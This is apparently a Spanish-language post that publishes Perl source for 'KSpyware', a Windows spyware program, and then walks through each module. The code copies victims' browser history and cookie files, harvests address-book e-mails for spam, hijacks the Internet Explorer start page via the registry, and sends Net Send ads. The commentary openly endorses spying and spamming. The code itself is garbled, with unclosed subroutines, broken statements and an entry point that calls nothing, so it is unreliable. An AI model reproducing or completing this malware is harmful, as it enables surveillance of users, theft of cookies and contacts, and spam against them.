Codigo Fuente del Virus spyware



### KSpyware v0.1 for educational purpose ###############

use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;

### With the code below, we can obtain the installed #########
### programs on the system #########################

sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";

opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";

print PF join(' - ', readdir(PROGRAMFILES));
close PF;

### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################

sub indexsites {
my $name;

$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\Documents and Settings\\" . $name .
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);


### With the code below, we can obtain a list of ########
### e-mails adresses (for spam...) #################

sub mails {
my $name;

$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);


### Hijack IE by modifying the main page ##########

sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};

$userKey->{"Main//Start Page"}= [ "", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "", "REG_SZ" ];

### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####

sub pub {
to => "",
message => "Here, a small ad in order to earn money or to spam!!!");

### Entry point !!! #######

$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";


exit 0;

Ahora les explicare para que sirve cada modulo de este codigo en perl.

Con este codigo obtendremos una lista de programas instalados en el sistema.


### With the code below, we can obtain the installed #########
### programs on the system #########################

sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";

opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";

print PF join(' - ', readdir(PROGRAMFILES));
close PF;

Con este codigo obtendremos las direcciones URL que la victima a visitado, tambien tendremos las cookies.


### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################

sub indexsites {
my $name;

$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\Documents and Settings\\" . $name .
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);


Con este codigo obtendremos direcciones de correo electronico para poder hacer spam...


### With the code below, we can obtain a list of ########
### e-mails adresses (for spam...) #################

sub mails {
my $name;

$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);


Con este codigo sabotearemos el IE explorer para cambiar la pagina de inicio.


### Hijack IE by modifying the main page ##########

sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};

$userKey->{"Main//Start Page"}= [ "", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "", "REG_SZ" ];

Para utilizar este codigo necesitamos que el Net Send este activado, asi podemos enviar anuncioes etx es como spam.


### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####

sub pub {
to => "",
message => "Here, a small ad in order to earn money or to spam!!!");

Y con este el entry point...


### Entry point !!! #######

$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";


exit 0;
